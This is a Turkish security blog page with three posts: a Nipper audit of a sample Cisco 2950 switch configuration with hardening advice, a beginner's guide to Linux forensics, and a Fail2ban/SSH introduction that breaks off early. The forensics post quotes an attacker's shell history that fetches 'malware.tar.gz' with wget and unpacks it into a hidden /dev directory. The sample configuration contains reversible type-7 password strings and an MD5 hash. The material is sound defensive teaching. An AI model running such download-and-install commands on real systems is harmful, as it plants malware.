Sınır Güvenliği Cihazlarının Sıkılaştırılmasında Test ve Denetim Araçlarının Kullanılması (Nipper)

27 Şub
2010
Yorum
Yap

Ağ güvenliği, gün geçtikçe daha çok önem kazanan bir konu haline gelmektedir. Bunun başlıca sebepleri arasında e-ticaretin hızla yaygınlaşması, bankaların interaktif uygulamalarının çeşitlenmesi ve e-devlet kavramının önem kazanması olarak gösterilebilir. Ağın güvenli olabilmesi, o ağda bulunan cihazların ayrı ayrı güvenli bir şekilde yapılandırılmış olmasıyla doğrudan ilişkilidir.

Dolayısıyla aktif ağ cihazlarına ait yapılandırmaların sıkı olması ve güvenliğinin en yüksek seviyeye çıkarılması sistemin genel güvenliğini artırmak için önemlidir. Örneğin, ağ cihazında http servisinin gereksiz yere açık olduğu ve bu servise erişimlerin kısıtlanmadığı durumlarda, http servisini kullanarak cihaza saldırı gerçekleştirecek olan bir kişi cihazın yapılandırma dosyasına ulaşabilir veya cihazın işleyişini engelleyecek girişimlerde bulunabilir. Sıkılaştırma işleminde amaç genel olarak aşağıdaki maddelerle gösterilebilir: 

  • Cihaz yönetimine olan erişimin kontrol altına alınması ve cihaza yetkisiz erişimlerin engellenmesi

  • Cihaz üzerinden geçen trafiğin denetlenmesi ve gereksiz trafiğin engellenmesi

  • Cihaza veya ağa yapılacak olan saldırıların başarı oranının en düşük seviyeye çekilmesi

Sıkılaştırma yapılırken dikkate alınması gereken başlıca hususlar arasında işletim sistemi güncelliği, parola koruması, yetkilendirme derecelerinin ayarlanması, uzaktan erişimin kısıtlanması, yerelden erişimin kısıtlanması, erişimlere ve trafiğe ait kayıtların tutulması, IP sahtekârlığına önlem alınması, servis dışı bırakma saldırılarına önlem alınması, kullanılmayan servislerin kapatılması ve kullanılan servislere olan erişimlerin kısıtlanması gösterilebilir.

Sıkılaştırma yapılırken herhangi bir sorun çıkmaması için sıkılaştırma yapılmadan önceki ayarların kaydedilmesi ve yapılandırma dosyasının saklanması tavsiye edilir. Eğer sıkılaştırma sırasında herhangi bir işleve yönelik sorun çıkarsa ve eğer sorun birkaç adımda çözülemezse, eski ayarların tekrar uygulanması gerekebilir.

Sıkılaştırma yapmak için değişik yollar izlenebilir. Cihaza ait yapılandırma dosyası incelenerek gerekli yerlerde sıkılaştırma yapılabileceği gibi, yapılandırma dosyası hazır bir yazılımla da test edilebilir ve yazılımın raporu doğrultusunda gerekli ayarlamalar yapılabilir.

Sıkılaştırma işleminde kullanılmak üzere pek çok yazılım bulunmaktadır. Bu yazılımlardan bazıları ücretsiz, bazıları ise ücretlidir. Yazının kalan kısmında ücretsiz bir yazılım olan Nipper ile yapılandırma dosyalarının incelenmesi ve güvenlik analizi anlatılacaktır. Ayrıca örnek olarak, IOS işletim sistemiyle çalışan Cisco anahtara ait yapılandırma dosyasının Nipper yazılımı tarafından incelenmesi sonucu ortaya çıkan rapor ve tavsiyeler verilecektir.

Nipper ücretsiz bir yapılandırma dosyası inceleme ve güvenlik analiz yazılımıdır. Nipper yazılımı kullanılarak, bazı ağ cihazlarının yapılandırma dosyaları güvenlik açısından incelenebilir.

Nipper yazılımının desteklediği cihazlar ve işletim sistemleri şunlardır:

  • Cisco IOS işletim sistemine sahip anahtarlar

  • Cisco IOS işletim sistemine sahip yönlendiriciler

  • Cisco CatOS işletim sistemine sahip anahtarlar

  • Cisco PIX güvenlik duvarı

  • Cisco ASA güvenlik duvarı

  • Cisco FWSM güvenlik duvarı

  • Cisco CSS tabanlı içerik servis anahtarları

  • Juniper Netsecreen ScreenOS tabanlı güvenlik duvarı

Güvenlik incelemesinde Nipper, parola ve bağlantı zamanaşımı sürelerini test edebilir. Bu seçenekler nipper komut satırından değiştirilebilmektedir. Seçenekler şunlardır:

  • Zamanaşımı testi

  • En küçük parola uzunluğu testi

  • Parolada büyük harf varlığı testi

  • Parolada küçük harf varlığı testi

  • Parolada sayı varlığı testi

  • Parolada özel karakter varlığı testi

  • Parolalara sözlük saldırısı testi

Nipper, yapılandırma dosyası güvenlik analizinde yapılandırma dosyasında bulunan bazı önemli kısımları incelemektedir. Yapılandırma dosyası güvenlik analizinde Nipper tarafından incelenen ve denetlenen kısımlardan bazıları şunlardır:

IOS tabanlı işletim sistemlerinde:

  • Yazılım versiyonları

  • Varsayılan parolalar

  • Zayıf şifreler

  • OSPF asılama

  • EIGRP asıllama

  • RIP asıllama

  • VRRP asıllama

  • Bağlantı zamanaşımları

  • AUX portu

  • Kaynak yönlendirme

  • Finger servisi

  • http servisi

  • SNMP Versiyon 1 / 2

  • TelnetErişim listeleri

  • Anahtar port güvenliği

  • Kayıt tutma

  • Proxy ARP

  • SSH Protokol versiyonu

  • CDP

  • En düşük parola uzunluğu

  • Bootp

  • IP Unreachables

  • Enable parolası

  • Gizli/Açık parola

  • Banner

PIX/ASA/FWSM: 

  • Bağlantı zamanaşımları

  • Erişim kontrol listeleri

  • SSH protocol versiyonu

  •  

Juniper Netscreen: 

  • Politikalar

  • Bağlantı zamanaşımı

  • Yönetimsel http yönlendirme

  • Yönetim IP numarası

 

 

Nipper Yazılımı ile Örnek Bir Yapılandırma Dosyasını İnceleme

 

Bu kısımda, Nipper yazılımı ile incelenen Cisco anahtara ait yapılandırma dosyası ve bu yapılandırma dosyası ile ilgili güvenlik raporu verilecektir. Örnek Cisco IOS yapılandırma dosyası: 

 

version 12.1

no service pad

service timestamps debug uptime

service timestamps log uptime

service password-encryption

hostname Cisco-2950

enable secret 5 $1$xv3v$3syk.LQ9ZwjE4/F5A3Lb37

enable password 7 095C4F4D5D1247000F

username admin password 7 095C4F4D5D1247000F

ip subnet-zero

no ip domain-lookup

cluster enable INTERNET 1

cluster member 2 mac-address 0007.85d7.d456

cluster member 3 mac-address 0007.50ef.f345

cluster member 4 mac-address 0007.8503.3266

cluster member 5 mac-address 0009.7c90.d341 vlan 1

spanning-tree mode pvst

no spanning-tree optimize bpdu transmission

spanning-tree extend system-id

interface Loopback0

no ip address

no ip route-cache

interface Port-channel1

interface Port-channel2

interface FastEthernet0/1

description TEST1

switchport access vlan 11

interface FastEthernet0/2

description TEST2

switchport access vlan 6

switchport mode access

interface FastEthernet0/3

description TEST3

switchport access vlan 11

switchport mode access

switchport port-security

shutdown

interface FastEthernet0/4

description TEST4

switchport access vlan 11

switchport mode access

switchport port-security

switchport port-security maximum 4

switchport port-security violation restrict

shutdown

spanning-tree portfast

interface FastEthernet0/5

description TEST5

switchport access vlan 20

switchport mode access

switchport port-security

switchport port-security violation restrict

switchport port-security mac-address 0016.6764.451b

spanning-tree portfast

interface GigabitEthernet0/1

switchport mode trunk

interface GigabitEthernet0/2

interface Vlan1

no ip address

no ip route-cache

shutdown

interface Vlan6

ip address 10.1.1.5 255.255.255.0

ip access -group 15 in

no ip route-cache

ip default-gateway 10.1.1.1

no ip http server

ip access -list extended CMP-NAT-ACL

dynamic Cluster-HSRP deny ip any any

dynamic Cluster-NAT permit ip any any

logging 10.3.1.8

access -list 15 permit 10.1.1.1

access -list 15 permit 10.1.1.34

access -list 15 deny any

snmp-server community commtest1 RO 15

snmp-server community commtest2 RO

snmp-server enable traps snmp authentication linkdown linkup coldstart

snmp-server enable traps config

snmp-server enable traps syslog

snmp-server enable traps entity

snmp-server enable traps rtr

snmp-server enable traps c2900

snmp-server enable traps vtp

snmp-server enable traps MAC-Notification

snmp-server enable traps hsrp

snmp-server enable traps cluster

snmp-server enable traps vlan-membership

line con 0

exec-timeout 0 0

password 7 095C4F4D5D1247000F

login local

line vty 0 4

password 7 095C4F4D5D1247000F

login local

line vty 5 15

access -class 15 in

password 7 095C4F4D5D1247000F

login local

End 

Konfigürasyon dosyası Nipper yazılımı tarafından incelendiğinde aşağıdaki güvenlik sonuç raporu ortaya çıkmıştır.  

Cisco Switch Device Cisco–2950 Security Report

Nipper performed a security audit of the Cisco Switch Cisco-2950 on Thursday March 2008. This report details the security-related issues identified during the security audit, the impact of each issue and any recommendations.

  • Software Version

  • Weak Passwords / Keys

  • Inbound TCP Connection Keep Alives

  • Connection Timeout

  • Simple Network Management Protocol

  • ICMP Redirects

  • Access Control Lists

  • Switch Port Trunking

  • Switch Port Security

  • Proxy ARP

  • Cisco Discovery Protocol

  • BOOTP

  • IP Unreachables

  • Enable Secret

  • Login Banner

  • Maintenance Operations Protocol

Software Version

Observation: It is critically important that software be regularly maintained with patches and upgrades in order to help mitigate the risk of an attacker exploiting a known software vulnerability. Furthermore, additional security features and other functionality are normally added or extended with each software revision.

Nipper determined that the Cisco Switch Cisco-2950 was running the out of date software Internet Operating System (IOS) version 12.1. Some of the known vulnerabilities for this software version are listed in Table 1. 

 

 Description   CVE Reference 
   Bugtraq ID
 ?/ http request denial of service   CVE-2000-0984    1838
 http configuration arbitrary administrative access   CVE-2001-0537    2936
 SSH denial of service   CVE-2002-1024    5114
 2GB http GET buffer overflow   CVE-2003-0647    8373
 http malformed request denial of service   -    10014
 Telnet remote denial of service   CVE-2004-1464    11060
 Ipv4 TCP listener denial of service   CVE-2007-0479    22208
 

 Table 1: Potential software vulnerabilities

It is worth noting that Nipper used the version number detailed in the device configuration to identify the potential vulnerabilities, and patches may have already been applied. Additionally, a specific device configuration may be required in order for device to become vulnerable.

Impact: The vulnerabilities listed in Table 1 could allow an attacker to gain remote administrative access or perform a Denial of Service (DoS) attack.

Ease: Exploit code is widely available on the Internet for known Cisco Switch vulnerabilities.

Recommendation: Nipper strongly recommends that the software be updated and patched to the latest software version. Furthermore, Nipper recommends that the current patch policy be reviewed.

Weak Passwords / Keys

Observation: Strong passwords tend to contain a number of different types of character, such as uppercase and lowercase letters, numbers and punctuation characters. Weaker passwords tend not to contain a mixture of character types. Additionally, weaker passwords tend to be short in length.

Nipper identified two passwords/keys that did not meet the minimum password complexity requirements. These are listed in Table 2.


 Type  Service  Username  Password
 Community  SNMP  (read-only)  commtest1
 Community  SNMP  (read-only)  commtest2
 

Table 2: Weak passwords / keys

Impact: If an attacker were able to gain a password or key, either through dictionary-based guessing techniques or by a brute-force method, the attacker could gain a level of access to Cisco-2950.

Ease: A number of dictionary-based password guessing and password brute-force tools are available on the Internet.

Recommendation: Nipper strongly recommends that the weak passwords be immediately changed to ones that are stronger. Nipper recommends that passwords be made up of at least eight characters in length and contain either uppercase or lowercase characters and numbers.

Inbound TCP Connection Keep Alives

Observation: Connections to a Cisco Switch device could become orphaned if a connection becomes disrupted. An attacker could attempt a DoS attack against a Cisco Switch by exhausting the number of possible connections. Transmission Control Protocol (TCP) keep alive messages can be configured to confirm that a remote connection is valid and then terminate any orphaned connections.

Nipper determined that TCP keep alive messages are not sent for connections from remote hosts.

Impact: An attacker could attempt a DoS by exhausting the number of possible connections.

Ease: Tools are available on the Internet that can open large numbers of TCP connections without correctly terminating them.

Recommendation: Nipper recommends that TCP keep alive messages be sent to detect and drop orphaned connections from remote systems. TCP keep alive messages can be enabled for connections from remote systems using the following command:

service tcp-keepalives-in 

Connection Timeout

Observation: Connection timeouts can be configured for a number of the device services. If a timeout were configured on an administrative service, an administrator that did not correctly terminate the connection would have it automatically closed after the timeout expires. However, if a timeout is not configured, or is configured to be a long timeout, an unauthorised user may be able to gain access using the administrator’s previously logged-in connection.

Nipper identified three connection settings that were not configured to timeout within ten minutes, these are listed in Table 3.

 

 Connection 
  Timeout 
 Console line 0   No Timeout
 VTY lines 0 to 4   No Timeout
 VTY lines 5 to 15   No Timeout
 
 

Table 3: Connections with inadequate timeout periods

Impact: An attacker who was able to gain access to a connection that had not expired, would be able to continue using that connection. A connection could be a console port on the device that was not correctly terminated or a remote administrative connection.

Ease: The attacker would have to gain physical access to the device to use the console port, or gain remote access to an administration machine that is attached to the port. To gain access to remote connections, an attacker would have to be able to intercept network traffic between the client and Cisco-2950. The attacker would then have to take over the connection, which could be very difficult with some services. Tools are available on the Internet that would facilitate the monitoring of network connections.

Recommendation: Nipper recommends that a timeout period of ten minutes be configured for connections to the device Cisco-2950.

Simple Network Management Protocol

Observation: Simple Network Management Protocol (SNMP) is widely used to anne network administrators in monitoring and managing a variety of network devices. There are three main versions of SNMP in use. Versions 1 and 2 of SNMP are secured with a community string, both authenticate and transmit network packets with no encryption. SNMP version 3 provides three authentication methods. SNMP version 3 No-Auth access requires a username to authenticate and provides no encryption. SNMP version 3 Auth access requires a username and the auth keyword, authentication is encrypted but SNMP network packets are transmitted with no encryption. SNMP version 3 Auth and Priv access requires a username, auth and priv keywords. SNMP version 3 Auth and Priv access provides complete encryption of authentication and SNMP network packets.

Nipper determined that SNMP protocol version 1 was configured on Cisco-2950.

Impact: An attacker who was able to monitor network traffic could capture device configuration settings, possibly including authentication details.

Ease: Network packet monitoring and capture tools are widely available on the Internet.

Recommendation: Nipper recommends that, if possible, SNMP version 1 be disabled. Furthermore, Nipper recommends that, if SNMP is required, protocol version 3 be configured with Auth and Priv authentication. SNMP protocol version 1 can be disabled with the following command for each community string:

no snmp-server community <Community String> <RO | RW>

SNMP version 3 Auth and Priv access can be configured with the following commands:

snmp-server group <Group Name> v3 priv
snmp-server user <Username> <Group Name> v3 auth md5 <Auth Keyword> priv <3des | aes 128 | aes 192> <Priv Keyword>

ICMP Redirects

Observation: Internet Control Message Protocol (ICMP) redirect messages allow systems to change the route that network traffic takes. ICMP redirects are usually enabled by default on Cisco devices.

Nipper determined that the device Cisco-2950 had support for ICMP redirects enabled on the network interface Vlan6.

Impact: An attacker could use ICMP redirect messages to route network traffic through their own router, possibly allowing them to monitor network traffic.

Ease: Tools are widely available that can send ICMP redirect messages.

Recommendation: Nipper recommends that, if not required, ICMP redirects be disabled on all network interfaces. ICMP redirects can be disabled on each individual network interface using the following command:
 

no ip redirects

 

Access Control Lists

Observation: Access Control List (ACL) are sequential lists of allow and deny Access Control Entries (ACE) that specify whether network traffic should be allowed or dropped. ACLs are used to restrict access to services and network devices, preventing access to services and devices that should not be accessible.

Nipper identified one insecure ACE. The ACL 15 does not end with a deny all and log

Impact: If ACEs are not sufficiently restrictive, an attacker may be able to access to network devices that should not be accessible. Furthermore, an attacker who had compromised a device could install a backdoor which could listen on a network port that was not filtered.

Ease: N/A

Recommendation: Nipper recommends that all ACLs be configured to only allow access to hosts and services from those hosts that require access. However, in certain circumstances, such as a public web server, a more relaxed configuration may be required to allow any host to access specific hosts and services. Additionally, Nipper recommends that all blocked network traffic be logged.

Switch Port Trunking

Observation: Cisco Switch devices are able to transfer Virtual Local Area Network (VLAN) packets to different network devices, extending a VLAN across different physical devices. In order to extend a VLAN to a different physical device, a trunk has to be created between the devices. Cisco Switch devices default to allowing a trunk to be negotiated on a particular switch port if the connected device will also allow the trunk and supports a common trunking protocol.

Nipper determined that two switch ports allowed a trunk to be negotiated, these are listed in Table 4.

 

 Interface Description
 GigabitEthernet0/1  -
 
 

Table 4: Switch ports that allow trunking

Impact: An attacker who was able to create a trunk would gain direct access to all the VLANs extended over the trunk. This would allow an attacker to bypass any network filtering between the VLANs.

Ease: The attacker would require knowledge of network trunking. However, tools are available on the Internet that can exploit trunking vulnerabilities.

Recommendation: Nipper recommends that, where possible, all switch ports be configured to provide no trunking. If trunking is required on a specific switch port, Nipper recommends that the switch port be configured to trunk only the required VLANs. Switch ports can be configured to provide no trunking on each interface with the following commands:

switchport mode access
switchport nonegotiate

Switch Port Security

Observation: Switch port security enables a Cisco Switch to help prevent unauthorised access to the network by limiting the Media Access Control (MAC) addresses allowed on specific ports. MAC addresses can either be specified for a particular switch accesses can be learned by the Cisco Switch. When port security is configured a variety of actions can be taken when a violation occurs, such as automatically disabling the port.

Nipper identified 6 switch ports that had no port security configured, these are listed in Table 5.

 

  Interface 
  Description
  Port-channel1    –
  Port-channel2    -
  FastEthernet0/1    TEST1
  FastEthernet0/2    TEST2
  GigabitEthernet0/1     -
  GigabitEthernet0/2     -
 
 

Table 5: Switch ports with no port security

Impact: A switch port with no configured port security could allow an attacker to attach an unauthorised device and scan other network attached devices. Depending on the security of the network attached devices, this issue could allow an attacker to perform information gathering, or potentially, gain access to vulnerable devices.

Ease: An attacker would have to gain access to a switch port with no security configured. If the switch port is not directly patched to a wall socket, the attacker would have to gain physical access to the Cisco Switch.

Recommendation: Nipper recommends that, where possible, port security be enabled on all switch ports. Furthermore, Nipper recommends that all switch ports that are not used be shutdown. Switch port security with MAC address learning and port shutdown on a violation can be configured on each interface with the following commands:

switchport port-security

switchport port-security violation shutdown

switchport port-security mac-address sticky

Unused interfaces can be disabled with the following interface command:

shutdown 

Cisco Discovery Protocol

Observation: Cisco Discovery Protocol (CDP) is a proprietary protocol that is primarily used by Cisco, but has been used by others. CDP allows some network management applications and CDP aware devices to identify each other on a Local Area Network (LAN) segment. Cisco devices, including switches, bridges and routers are configured to broadcast CDP packets by default. The devices can be configured to disable the CDP service or disable CDP on individual network interfaces.

Nipper determined that the CDP service had not been disabled, and additionally, had not been disabled on all the active network interfaces.

Impact: CDP packets contain information about the sender, such as hardware model information, operating system version and IP address details. This information would allow an attacker to gain information about the configuration of the network infrastructure.

Ease: CDP packets are broadcast to an entire network segment. An attacker could use one of the many publicly available tools to capture network traffic and view the leaked information.

Recommendation: Nipper recommends that, if not required, the CDP service be disabled on the Cisco device Cisco-2950. If CDP is required, Nipper recommends that CDP be disabled on all interfaces except those that are explicitly required.

The CDP service can be disabled by issuing the following Cisco IOS command:

no cdp run

CDP can be disabled on individual interfaces using the following command:

no cdp enable

In some configurations with IP phones, deployed using either Auto Discovery or Dynamic Host Configuration Protocol (DHCP), the CDP service may need to be enabled. In this situation CDP should be disabled on all network interfaces for which it is not required.

BOOTP

Observation: BOOTstrap Protocol (BOOTP) is a datagram protocol that allows compatible hosts to load their operating system over the network from a BOOTP server. Cisco routers are capable of acting as BOOTP servers for other Cisco devices and the service is enabled by default. However, BOOTP is rarely used and may represent a security risk.

Nipper determined that BOOTP was not disabled. However, it is worth noting that not all Cisco devices support BOOTP.

Impact: An attacker could use the BOOTP service to download a copy of the router’s IOS software.

Ease: Tools are available on the Internet to access BOOTP servers.

Recommendation: Nipper recommends that, if not required, the BOOTP service be disabled. The following command can be used to disable BOOTP:

no ip bootp server

IP Unreachables

Observation: ICMP IP unreachable messages can be generated by a Cisco device when a host attempts to connect to a non-existent host, network, or use an unsupported protocol. ICMP IP unreachable messages will let the connecting host know that the host, network or protocol is not supported or cannot be contacted. Therefore, the host does not have to wait for a connection time-out. ICMP IP unreachable messages are normally enabled by default on Cisco devices and must be explicitly disabled.

Nipper determined that the Cisco device Cisco-2950 had ICMP IP unreachable messages enabled on the interface Vlan6.

Impact: An attacker who was performing network scans to determine what services were available would be able scan a device more quickly.

Ease: Tools are available on the Internet that can perform a wide variety of scan types.

Recommendation: Nipper recommends that, if not required, IP unreachables be disabled on all network interfaces. However, whilst disabling IP unreachables will not stop scans, it does make it more difficult for an attacker. The IP unreachables option is disabled or enabled individually for each network interface. It can be disabled with the following command:

no ip unreachables

Enable Secret

Observation: Cisco IOS-based device enable passwords can be stored using an iterated MD5 hash, which is far stronger than the easily reversible Cisco type-7 encryption.

Nipper identified one enable password that was not stored using the MD5 hash.

Impact: An attacker could use an enable password from a Cisco device to access the device and possibly modify its configuration.

Ease: An attacker who had accessed to the Cisco configuration file would easily be able to retrieve passwords that are stored in clear-text or using the Cisco type-7 encryption. However, an attacker who had accessed to a Cisco configuration file could brute-force any stronger MD5 passwords.

Recommendation: Nipper recommends that all enable passwords be stored using the MD5 hash. Enable passwords can be stored using the MD5 hash with the following Cisco IOS command:

enable secret

Login Banner

Observation: A banner message can be shown to users who connect to one of the remote management services, such as Telnet. Typically banner messages will include information on the law with regard to unauthorised Banner to the device, warning users who do not have the authority to Banner the device about the consequences.

Nipper determined that no login banner was configured.

Impact: Attackers who have gained Banner to a device could avoid legal action if no banner is configured to warn against unauthorised Banner.

Ease: N/A

Recommendation: Nipper recommends that a banner be configured that warns against unauthorised Banner. Banners are configured on Cisco devices using a delimiter character. A delimiter character is specified in the banner command and is used again to mark the end of the banner. The Cisco command to add a login banner, that is presented to users prior to authentication, is:

banner login <delimiter>The banner text<delimiter>

Sonuç

Raporda da görüldüğü gibi Nipper yazılımı, yapılandırma dosyası hakkında ayrıntılı bir güvenlik analizi yapmaktadır. Cihaz yazılımında tespit edilen açıklıklara ait bilgiler vermekte, şifre testi yapmakta ve servislere ilişkin tavsiyelerde bulunmaktadır. Yaptığı bu analiz neticesinde elde ettiği bulguları ve bu bulgulara ilişkin tavsiyeleri sonuç raporuna yansıtmaktadır. Nipper tarafından desteklenen cihazlara ait yapılandırma dosyasının incelenerek, verilen tavsiyelerle sıkılaştırma yapılması sistem güvenliği adına bir katkıda bulunacaktır. 

Yazar: ceyhun çamlı Cisco, Security | Etiketler: , , , , , , ,

UNIX/Linux İşletim Sistemlerinde Adli Bilişim – 1

26 Şub
2010
Yorum
Yap

Hazırlanan teknik yazının amacı *NIX sistemleri özelinde adli bilişim konusundaki Türkçe çalışmaların eksikliğini bir ölçüde  de olsa kapatmaktır.

Bu yazı  *NIX sistemlerinde uygulanabilecek ve sadece temel  adli (forensik) analiz tekniklerini kapsayacaktır. Kullanılan yazılımlar oldukça genel tutulmaya çalışılmıştır. Sizin karşı karşıya bulunduğunuz durumlar için daha uygun bir yazılım var ise ona yönelmeniz daha doğru olacaktır.

Bu teknik yazı ve ardından yayınlanması planlanan yazılar sonunda anlatılan tekniklerle:

·         Ele geçirilmiş sistemleri inceleyebilir,

·         Sistemin nasıl ele geçirildiğini öğrenebilir,

·         İleri düzeyde inceleme için gerekli temel bilgilere sahip olabilirsiniz.

Önemli Uyarı: Herhangi bir adım atmadan önce önemli bir karar verilmelidir. Eğer var olan saldırıya kolluk kuvvetlerini dahil edilecek ve saldırgan hakkında soruşturma başlatılacaksa kesinlikle sistemi olduğu şekilde bırakmak ve hiç bir şekilde sistem üzerinde bir değişiklik yapmamak gerekmektedir.

Saldırı sonrası yapılacak herhangi bir değişiklik, var olan delilleri değiştirebilir ya da tümüyle ortadan kaldırabilir. Bu nedenle şirketlerin bu türlü durumlar için "saldırıya uğramış sistemlere dokunmama ve asla fişini çekme" kuralını uygulamasında yarar vardır. Bu şekilde kolluk kuvvetleri varıncaya kadar deliller korunmuş olur.

Bilişim Suçları ve Sistemleri Şube Müdürlüğüne bağlı görevli memurlar, büyük olasılıkla komple bir şekilde saldırıya uğramış sistemi veya en azından sürücülerini içindeki bilgileri güvenli bir biçimde saklamak için isteyeceklerdir. Bu noktadan itibaren sizin adli bilişim analiziniz bitmiş bulunmaktadir.

Eğer saldırıyı kendi bünyenizde araştıracaksanız bu makalede ve sonrasında yayınlanacak makalelerde sunulan örneklerden faydalanılabilir. 

Motivasyon

Kimse mükemmel değildir. Herkes hata yapabilir. Ancak, aynı hataya iki kez düşmekten mümkün olduğunca kaçınılmalıdır.

Bu makalede sunulan örnekler için bir Linux dağıtımı olan Ubuntu 8.10 kullanılmıştır. Daha önce yayınlanan "Fail2ban ile Linux Sistemlerini Koruma " makalesinde  belirtildiği üzere bu teknikler pek az bir farkla tüm Linux sistemleri için geçerli olacaktır. Yazılarda yer alan komutlardan bazıları sadece root kullanıcısının çalıştırabileceği komutlardır. Bu nedenle root olarak sisteme giriş yapılması veya sudo ile komutların çalıştırılması gerekmektedir.

Ağ Bağlantılarının Kontrol Edilmesi

Ağ bağlantıları ve açık portlar netstat komutu ile kontrol edilir.

Kullanım

# netstat -an 

Bu komut yardımıyla herhangi bir arka kapı "backdoor" var ise görülebilir.

tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 

tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 

tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 

Yukarıdaki çıktıya göre IRC için kullanılan 6697 portu açık görünmekte. Bu iyiye  işaret olmayabilir.  tcpdump yardımı ile bu porttaki bağlantı dinlenebilir. (tcpdump ile ilgili bir teknik yazıyı ilerleyen günlerde yayınlanacaktır.)

# tcpdump port 6697

 Bu noktada saldırganların "hacker" iletişimi büyük ihtimalle görülebilir ve sistemin nasıl ele geçirildiği hakkında bilgi sahibi olunabilir.

Son Giriş Yapan IP'leri Kontrol Edilmesi

Brute-force attack  oldukça popüler bir saldırı şeklidir. Saldırıyı gerçekleştiren kişiler last komutu yardımıyla saptanabilir.

last  komutu  kullanıcının  giriş ve çıkış zamanlarının belirlenmesinden,  bilgisayar-adı (hostname) ve IP adresi bilgilerinin elde edilmesinde kullanılabilir.

# last -25

Yukarıdaki komut, sistemde oturum açan son 25 kullanıcı hakkında bilgi verir.

 /var/log/auth_log  dosyası da  başarılı veya başarısız oturum açma girişimleri ile ilgili bilgiler içermektedir.

Son Çalıştırılan Komutları Öğrenme

Hiç bir suç mükemmel değildir. Bu adli bilişim için çok doğru bir saptamadır. Çok az sayıda saldırgan parmak izini bırakmadan dijital suç işleyebilir. 

Örneğin, birçok saldırgan .bash_history dosyasında önemli ip uçları bırakarak sistemi terkeder. .bash_history dosyası kullanıcıların çalıştırdığı son komutları içerir.

bash_history dosyası bize saldırganların neler yaptıkları, hangi programları yükledikleri, indirdikleri dosyaları nerelerden aldıkları hakkında bir çok bilgi verebilir. Saldırıya uğramış bir Linux makinesi aşağıdaki tarzda kayıtlar içerebilir.

wget http://malware.tar.gz 

gunzip malware.tar.gz 

tar xf malware.tar 

cd hpd 

cd .. 

rm malware.tar 

cd /dev/.hpd 

Yukarıda görülen komutlar bize kötü amaçlı yazılımın nereden alındığı, nasıl çalıştırıldığı ve nereye yüklendiği hakkında bir fikir vermektedir. Bu bilgiler elde edildikten sonra, yapılması gereken ilk iş saldırganın klasörlerine detaylı bir şekilde göz atmak olmalıdır.

.bash_history dosyasının bilgileri ne biçimde tuttuğu konusunda dikkatli olunmalıdır. .bash_history  dosyası sadece kullanıcı oturumu kapattıktan sonra onun çalıştırdığı tüm komutları gösterir.

Eğer saldırganın hala açık bulunan bir oturumu varsa ve onun .bash_history dosyası inceleniyorsa, boş bir dosya görülebilir.

Bu gibi durumlarda açık olan oturumları görebilmek için who komutunu kullanılabilir.

# who 

user1 pts/0 Nov 18 23:33 (1.2.3.4)

user2 pts/1 Nov 16 10:22 (5.6.7.8) 

Bu sistemde user1 ve user2 olmak üzere iki aktif kullanıcı görünmektedir. Eğer user2 hesabı ele geçirilmiş bir hesap ise, tcpdump ile bu kullanıcının etkinliği izlenebilir.

# tcpdump host 5.6.7.8 -w demo.dump 

Bu komut ile kullanıcının oturumu açtığı IP olan 5.6.7.8' i izlenerek demo.dump dosyasına tüm trafiği yazılmaktadır. Daha sonra tcpdump komutunun -r parametresi ile bu dosya okunabilir.

history komutuda oturumu açtığınız kullanıcının son çalıştırılmış komutlarını listeler. 

.bash_history Dosyasının Etkin Kullanımı

history komutu ve .bash_history dosyasından daha etkin bilgi alabilmek icin /etc/profile dosyasında bazı düzenlemeler yapılabilir.

/etc/profile dosyası uygun bir editör ile açılarak sonuna aşağıdaki satır eklenmelidir.

export HISTTIMEFORMAT="%h/%d – %H:%M:%S "

Artık komutların ne zaman çalıştırıldığıda görülebilecektir.

Önceden çallıştırılmış komutların zamanı .bash_history dosyasında olmayacaktır. Bu nedenle  sistem daha ele geçirilmeden bu değişikliğin  yapılması  gerekmektedir.

Sonuç

Bu teknik yazıda ele geçirilmiş (compromised) Unix/Linux sistemleri hakkında ağ bağlantısını kontrol etme, aktif oturumu olan kullanıcıları öğrenme, kullanıcıların son çalıştırdığı komutları görme, IP'lerini ve makine isimlerini öğrenme gibi temel bilgiler  edinilmesi hedeflendi.

Bu bilgilerin hepsi davetsiz misafirleri kontrol etmek ve sistemde var olan açıkları öğrenmek için oldukça kritik öneme sahiptir.

Bir sonraki teknik yazıda dijital saldırıya uğramış Linux sistemlerini incelemek için kullanabilecek temel araçlar hakkında bilgi verilecektir.

İsmail Güneydaş

http://www.bilgiguvenligi.gov.tr/adli-analiz/unix-linux-isletim-sistemlerinde-adli-bilisim-1.html

   

Yazar: ceyhun çamlı Security | Etiketler: , , , , , , , , ,

Fail2ban ile Linux Sistemlerini Koruma

25 Şub
2010
Yorum
Yap

Linux işletim sistemleri  ekonomik ve teknik nedenlerden dolayı sunucu (server) pazarında oldukca büyük rağbet görmektedir. Bu durum bilgisayar korsanlarının Linux işletim sistemlerinde yer alan programlar için özel atak metodları geliştirmesine yol açmaktadir.

Bu nedenle Linux makinelerininde atak engelleyici güvenlik programları büyük önem arz etmektedir.

Linux servis sağlayıcılarında SSH servisi, web servisi, mail servisi, FTP servisi gibi çeşitli programlar çalışmaktadır. Tüm bu programların log dosyalarını analiz edip bilgisayar korsanlarına karşı önlem almak oldukça zaman alıcı ve zordur.

Fakat Fail2ban sistem yöneticilerinin hayatını kolaylaştırmaktadır. Fail2ban  /var/log/pwdfail ya da /var/log/apache/error_log  gibi log dosyalarını taramakta ve eğer olağan dışı fazla hatalı şifre girişi varsa, giriş yapılan IP’yi  cezalandırmaktadır. Fail2ban güvenlik duvar kurallarını  atağın geldiği IP adreslerini engelleyecek şekilde yeniler.

Bu  makalede SSH servisinin özelinde Fail2ban’ın Linux makinelerini bilgisayar korsanlarından nasıl koruduğunu inceleyeceğiz.

SSH(Güvenli Kabuk-Secure Shell)

Tüm Linux sunucularında SSH servisi bulunmaktadir. SSH servisi ile İnternet üzerinden herhangi bir Linux makinesine bağlanılabilir, komut satırıyla makine üzerinde istenilen işlemler gerçekleştirilebilir.

SSH’ın cazip yanı tüm iletişimin kriptolanmiş olmasında yatmaktadır. Bu protokolün açık anahtarlı şifrelemeyi (public/private key encryption) desteklemesi populerliğini daha da artırmaktadır.

